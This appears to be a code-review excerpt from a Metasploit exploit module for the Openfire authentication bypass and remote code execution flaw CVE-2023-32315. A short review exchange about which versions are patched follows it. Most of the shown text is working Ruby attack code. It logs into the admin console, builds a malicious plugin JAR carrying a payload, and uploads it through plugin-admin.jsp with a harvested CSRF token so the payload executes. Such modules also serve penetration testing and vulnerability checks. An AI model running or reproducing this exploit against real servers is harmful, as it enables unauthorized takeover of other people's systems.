modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb

```diff
@@ -0,0 +1,275 @@
+      'keep_cookies' => true,
+      'vars_post' => {
+        'url' => '%2Findex.jsp',
+        'login' => 'true',
+        'csrf' => @csrf_token.to_s,
+        'username' => @admin_login['username'].to_s,
+        'password' => @admin_login['password'].to_s
+      }
+    })
+    if res && res.code == 200 && res.body.match(/login box/).nil?
+      return true
+    else
+      return false
+    end
+  end
+
+  def prepare_plugin_jar
+    # prepares the plugin foundation that will host the payload
+    files = [
+      [ 'logo_large.gif' ],
+      [ 'logo_small.gif' ],
+      [ 'readme.html' ],
+      [ 'changelog.html' ],
+      [ 'lib', 'plugin-metasploit.jar' ]
+    ]
+
+    jar = Rex::Zip::Jar.new
+    jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315'))
+
+    @plugin_name = datastore['PLUGINNAME'] || Rex::Text.rand_text_alphanumeric(8..15)
+    plugin_author = datastore['PLUGINAUTHOR'] || Rex::Text.rand_text_alphanumeric(8..15)
+    plugin_desc = datastore['PLUGINDESC'] || Rex::Text.rand_text_alphanumeric(8..15)
+
+    plugin_xml = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml'))
+    plugin_xml.gsub!(/PLUGINNAME/, @plugin_name)
+    plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
+    plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
+
+    jar.add_file('plugin.xml', plugin_xml)
+    return jar
+  end
+
+  def upload_and_execute_plugin(plugin_jar)
+    # upload and execute Openfire plugin with encoded payload
+    # returns true if upload is successful else returns false
+
+    # construct multipart form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part(plugin_jar.to_s, 'application/x-java-archive', 'binary', "form-data; name=\"uploadfile\"; filename=\"#{@plugin_name}.jar\"")
+
+    # extract the csrf token
+    cookie_jar.cookies.each do |cookie|
+      @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil?
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'plugin-admin.jsp'),
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'keep_cookies' => true,
+      'data' => form_data.to_s,
+      'vars_get' => {
+        'uploadplugin' => nil,
+        'csrf' => @csrf_token.to_s
+      }
+    })
+    # with a successfull upload and execution of the plugin, no response is returned.
+    return true unless res
+    # safety check if, for whatever reason, we get a 302 response back
+    if res.code == 302 && res.headers.to_s.match(/uploadsuccess=true/)
+      return true
+    else
+      return false
+    end
+  end
+
+  def check
+    openfire = get_version
+    return CheckCode::Safe if openfire.empty?
+    # check first for patched versions
+    return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8')
```

Comment:
Are these ever going to be higher?  Will there be a 4.6.9?

Reply:
Nope, vulnerability is fixed in 4.6.8. No new version in this branch will be released.
The same applies for version 4.7.5.
New branch 4.8.0 will be support the new releases.